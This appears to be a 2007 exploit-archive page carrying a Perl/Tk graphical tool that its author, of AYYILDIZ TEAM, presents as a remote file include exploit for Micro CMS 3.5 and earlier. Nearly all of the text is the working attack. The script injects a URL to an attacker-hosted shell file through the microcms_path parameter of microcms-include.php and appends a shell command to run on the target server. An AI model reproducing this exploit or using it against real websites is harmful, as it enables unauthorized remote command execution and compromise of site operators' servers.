Home / exploits microcms35.txt
Posted on 14 January 2007
#!/usr/bin/perl Script: Micro CMS 3.5 site: http://www.impliedbydesign.com/apps/microcms/microcms.zip Coded By : ilker Kandemir <ilkerkandemir[at]mynet.com> use Tk; use Tk::DialogBox; use LWP::UserAgent; $mw = new MainWindow(title => "AYYILDIZ.ORG :: Micro CMS <= 3.5 Remote File Include Exploit " ); $mw->geometry ( '500x300' ) ; $mw->resizable(0,0); $mw->Label(-text => 'Micro CMS <= 3.5 (show_hlp.php) Remote File Include Exploit', -font => '{Verdana} 7 bold',-foreground=>'blue')->pack(); $mw->Label(-text => '')->pack(); $fleft=$mw->Frame()->pack ( -side => 'left', -anchor => 'ne') ; $fright=$mw->Frame()->pack ( -side => 'left', -anchor => 'nw') ; $url = 'http://www.site.com/[Micro-CMS_PATH]/micro_cms_files/microcms-include.php?microcms_path='; $shell_path = 'http://site_server/shell.txt?'; $cmd = 'ls -la'; $fleft->Label ( -text => 'Script Path: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $url) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'Shell Path: ', -font => '{Verdana} 8 bold' ) ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $shell_path) ->pack ( -side => "top" , -anchor => 'w' ) ; $fleft->Label ( -text => 'CMD: ', -font => '{Verdana} 8 bold') ->pack ( -side => "top" , -anchor => 'e' ) ; $fright->Entry ( -relief => "groove", -width => 35, -font => '{Verdana} 8', -textvariable => $cmd) ->pack ( -side => "top" , -anchor => 'w' ) ; $fright->Label( -text => ' ')->pack(); $fleft->Label( -text => ' ')->pack(); $fright->Button(-text => 'Exploit Include Vulnerability', -relief => "groove", -width => '30', -font => '{Verdana} 8 bold', -activeforeground => 'red', -command => &akcja )->pack(); $fright->Label( -text => ' ')->pack(); $fright->Label( -text => 'Exploit coded by ilker Kandemir', -font => '{Verdana} 7')->pack(); $fright->Label( -text => 'AYYILDIZ TEAM', -font => '{Verdana} 7')->pack(); $fright->Label( -text => 'http://www.ayyildiz.org/', -font => '{Verdana} 7')->pack(); MainLoop(); sub akcja() { $InfoWindow=$mw->DialogBox(-title => 'AYYILDIZ TEAM Exploit by ilker kandemir ', -buttons => ["OK"]); $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => 'http://www.ayyildiz.org/', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; $InfoWindow->add('Label', -text => 'Greetz For my friends ', -font => '{Verdana} 6')->pack; $InfoWindow->add('Label', -text => '', -font => '{Verdana} 8')->pack; system("start $url$shell_path$cmd"); $InfoWindow->Show(); }